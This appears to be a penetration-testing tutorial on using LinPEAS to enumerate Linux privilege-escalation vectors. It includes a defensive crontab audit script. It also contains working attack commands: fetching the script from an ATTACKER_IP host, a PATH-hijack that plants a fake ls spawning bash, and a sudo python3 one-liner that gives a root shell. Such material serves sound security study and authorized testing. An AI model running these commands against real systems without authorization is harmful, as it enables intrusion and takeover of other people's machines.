Privilege escalation is one of the most critical phases of a penetration test. After gaining initial access to a Linux system, the next goal is often elevating privileges to root. LinPEAS (Linux Privilege Escalation Awesome Script) automates the enumeration process, scanning the system for hundreds of known misconfigurations, weak permissions, and exploitable conditions.
What Is LinPEAS?
LinPEAS is a shell script from the PEASS-ng project maintained by CarlosPolop. It doesn’t perform exploitation itself — it enumerates potential vectors and highlights them with color-coded output (red/yellow = high interest, blue = info). Think of it as a comprehensive checklist running in seconds rather than hours.
Getting LinPEAS onto the Target
On your attack machine, download the latest release:
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
Transfer it to the target using any available method:
# Option 1: Python HTTP server
python3 -m http.server 8000
# On target:
curl http://ATTACKER_IP:8000/linpeas.sh -o /tmp/linpeas.sh
# Option 2: SCP (if credentials known)
scp linpeas.sh user@TARGET_IP:/tmp/
# Option 3: Base64 encode and paste
cat linpeas.sh | base64 -w0
# On target, decode and write to disk
Once transferred, make it executable:
chmod +x /tmp/linpeas.sh
Running LinPEAS
Basic execution — output color-coded to terminal:
/tmp/linpeas.sh
Save output to a file (tee writes the ANSI color codes as-is, so view the file with less -R to see the colors):
/tmp/linpeas.sh 2>/dev/null | tee /tmp/linpeas_output.txt
Run faster with reduced checks (good for time-constrained CTFs):
/tmp/linpeas.sh -s
Run only specific sections using flags. For example, to check only process and network info:
/tmp/linpeas.sh -p # processes
/tmp/linpeas.sh -n # network
Key Areas LinPEAS Checks
SUID/SGID Binaries
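A SUID binary runs with the privileges of its owner (often root) regardless of who executes it; an SGID binary does the same with its group. LinPEAS highlights unusual SUID binaries:
# Manual equivalent (SUID only; use -perm -2000 for SGID)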
find / -perm -4000 -type f 2>/dev/null
Check GTFOBins for known SUID exploits on binaries like vim, find, python, nmap, and bash.
Writable Cron Jobs
If a script run by root’s crontab is world-writable, you can inject commands:
# LinPEAS flags these — verify manually:
cat /etc/crontab
ls -la /etc/cron.d/
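The same check from the hardening side, as an added example that is not LinPEAS code or part of the original page: it reads a system-format crontab (with a user field, as in /etc/crontab and /etc/cron.d/) and reports root jobs whose script, or the directory holding it, is group- or world-writable. The function names audit_crontab and loosely_writable are hypothetical.

```shell
#!/bin/sh
# Added example (not LinPEAS code): flag root cron jobs in a system-format
# crontab whose script, or the directory holding it, is group/world-writable.

# True if the path exists and has the group- or other-write bit set.
loosely_writable() {
    [ -e "$1" ] &&
    [ -n "$(find "$1" -prune \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null)" ]
}

# audit_crontab FILE
# Prints one "WRITABLE <path> (line N)" per finding; returns 1 if any.
# Expected line format: m h dom mon dow user command [args...]
audit_crontab() {
    ct_file=$1; ct_found=0; ct_n=0
    while IFS= read -r ct_line || [ -n "$ct_line" ]; do
        ct_n=$((ct_n + 1))
        set -f; set -- $ct_line; set +f      # split into fields, no globbing
        # Skip blank lines, comments and VAR=value environment lines.
        case ${1:-} in ''|'#'*|[A-Za-z_]*) continue ;; esac
        if [ "${1#@}" != "$1" ]; then        # @reboot-style shortcut: @x user cmd
            [ $# -ge 3 ] || continue
            ct_user=$2; shift 2
        else                                 # five time fields, then user
            [ $# -ge 7 ] || continue
            ct_user=$6; shift 6
        fi
        [ "$ct_user" = root ] || continue
        for ct_word in "$@"; do
            case $ct_word in /*) ;; *) continue ;; esac   # absolute paths only
            for ct_p in "$ct_word" "$(dirname "$ct_word")"; do
                if loosely_writable "$ct_p"; then
                    echo "WRITABLE $ct_p (line $ct_n)"
                    ct_found=1
                fi
            done
        done
    done < "$ct_file"
    return "$ct_found"
}

# Usage: audit_crontab /etc/crontab
#        for f in /etc/cron.d/*; do audit_crontab "$f"; done
```

Any path it reports should be owned by root with mode 755 or stricter, inside a directory that only root can write to.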
Sudo Privileges
LinPEAS runs sudo -l to list the commands the current user may run through sudo, including any that are allowed without a password (NOPASSWD):
sudo -l
If output shows something like (ALL) NOPASSWD: /usr/bin/vim, check GTFOBins for the escalation path.
Weak File Permissions
LinPEAS checks for writable /etc/passwd, /etc/shadow, and sensitive configuration files. A writable /etc/passwd lets you add a root user directly.
PATH Injection
If a root-owned script calls binaries without absolute paths, and you control a directory early in $PATH, you can hijack execution:
export PATH=/tmp:$PATH
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
Kernel Exploits
LinPEAS outputs the kernel version and flags known CVEs. Cross-reference with exploit-db or tools like linux-exploit-suggester:
uname -r
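Common kernel exploits: DirtyPipe (CVE-2022-0847), DirtyCOW (CVE-2016-5195), PwnKit (CVE-2021-4034). Note that PwnKit is a flaw in polkit's pkexec rather than in the kernel itself, so the kernel version alone does not tell you whether a host is affected.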
Interpreting the Output
LinPEAS uses color to prioritize findings:
- Red on yellow background: 99% chance of privilege escalation vector
- Red: Highly interesting
- Yellow: Worth investigating
- Green: Low-risk info (users, networking)
- Blue/Cyan: Info only
Focus on red findings first. A typical output might look like:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on target:
env_reset, mail_badpass
User www-data may run the following commands on target:
(ALL) NOPASSWD: /usr/bin/python3
This is a clear escalation path: sudo python3 -c 'import os; os.system("/bin/bash")' gives root.
LinPEAS is a starting point, not the whole answer. Combine it with:
- pspy: Monitor processes without root — catch cron jobs running as root in real time
- linux-exploit-suggester: Focused kernel CVE lookup
- LinEnum: Alternative enumeration script for comparison
# pspy
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64 && ./pspy64
Cleaning Up
In authorized tests, remove artifacts after enumerating:
rm /tmp/linpeas.sh /tmp/linpeas_output.txt
Practice Environments
The best way to learn LinPEAS is through hands-on labs with known escalation paths:
LinPEAS is an essential tool in any pentester’s toolkit. Run it early, read the red items carefully, and combine findings with manual verification to chain your path to root.